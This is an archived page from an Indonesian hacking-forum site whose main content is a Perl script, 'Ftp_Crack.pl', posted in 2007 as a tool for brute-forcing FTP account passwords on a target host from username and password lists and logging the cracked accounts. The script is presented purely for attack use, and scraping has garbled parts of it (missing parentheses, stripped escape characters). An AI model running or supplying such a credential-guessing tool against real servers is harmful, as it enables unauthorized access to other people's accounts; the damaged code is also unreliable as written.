www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 2
0 Members | 2 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2991
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 6:54 pm
Articles
By cyberlog
Published: April 25, 2007
Print    Email

Code:
#!/usr/bin/perl
#
# Ftp_Crack.pl - By B-r00t.
# File save .pl
# An FTP Protocol Hacker.
# Attempts to use brute force guesses to gain
# access to an ftp account on the target host.
# Cracked Accounts will be appended to FTP_CRACK.
#
# Caution: If the FTP Deamon is logging connections
# this is gonna make a serious mark in the Logs.
#
# Options include :
# Use either a single username OR a list of usernames.
# Use either a single password OR a list of passwords.
#
# ENJOY!

use strict;
use Getopt::Std;
use Net::FTP;

# CLEAR SCREEN.
print "n" x 40;

# COMMANDLINE.
use vars qw($opt_h $opt_u $opt_U $opt_p $opt_P);
getopt("h:u:U:p:";
if ((!$opt_h) || ((!$opt_u) && (!$opt_U)) || ((!$opt_p) && (!$opt_P)) ){ &usage; exit; };

# LOGFILE FILE TEST.
if (! -e "FTP_CRACK" {
open (LOGFILE, ">FTP_CRACK" or die "anERROR UNABLE TO OPEN FTP_CRACK.n $!";

print LOGFILE "n Ftp_Crack.pl by B-r00t aka B#.";
print LOGFILE "n Automated FTP Account Password Cracking.";
print LOGFILE "nnnn";
close LOGFILE;
};

# GLOBALS.
my $HOST = $opt_h; # Hostname of target server.
my $USER; # Username being tried.
my $PASS; # Password being tried.
my @USERNAMES; # Usernames in list.
my @PASSWORDS; # Passwords in list.
my $ftp; # Connection to host.


if ($opt_u) {$USERNAMES[0] = $opt_u;
chomp $USERNAMES[0];
print "nUSING SINGLE USERNAME: $USERNAMES[0]";
} else {
print "nREADING USERNAMES FROM $opt_U.";
open (USERFILE, "$opt_U" or die "anERROR UNABLE TO OPEN $opt_U.n $!";
@USERNAMES = <USERFILE>;
close USERFILE;
};

if ($opt_p) {$PASSWORDS[0] = $opt_p;
chomp $PASSWORDS[0];
print "nUSING SINGLE PASSWORD: $PASSWORDS[0]";
} else {
print "nREADING PASSWORDS FROM $opt_P.";
open (PASSFILE, "$opt_P" or die "anERROR UNABLE TO OPEN $opt_P.n $!";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
};

# MAIN LOOP
foreach my $U (@USERNAMES) {
chomp $U;
$USER = $U;
foreach my $P (@PASSWORDS) {
chomp $P;
$PASS = $P;
&connect;
&do_it;
};
};
&quit;
exit;

# CONNECTION.
sub connect {
print "nnATTEMPTING CONNECTION TO $HOST.";
undef($ftp);
while (! $ftp) {
$ftp = Net::FTP -> new ("$HOST" or warn "nnSorry Cant Connect To $HOSTn$!";
};
print "nnOK ... CONNECTED!!!nn";
};

# DO_IT.
sub do_it{
print "nTRYING : USERNAME = $USER PASSWORD = $PASS";
$ftp -> login($USER,$PASS) and &success;
$ftp -> quit;
};

# SUCCESS.
sub success {
open (LOGFILE, ">>FTP_CRACK" or die "anERROR UNABLE TO OPEN FTP_CRACK.n $!";
print "aaa";
print "nUSERNAME: $USER has PASSWORD: $PASS on $HOST.nnnnn";
print LOGFILE "nUSERNAME: $USER has PASSWORD: $PASS on $HOST.nn";
close LOGFILE;
&quit;
};

# USAGE.
sub usage {
print "nnn";
print "nUSAGE : $0 -h HOST [-u USERNAME || -U USERLIST] [-p PASSWORD || -P PASSLIST]";
print "n";
print "n-h = Hostname of FTP Server.";
print "n-u = Single Username to crack.";
print "n-U = List of Usernames to crack.";
print "n-p = Single Password to use.";
print "n-P = List of Passwords to use.";
print "nCracked Accounts are appended to FTP_CRACK.";
print "nn";
exit;
};

# QUIT.
sub quit {
print "nnI'M DONE ......nn";
exit;
};

View Comments (0)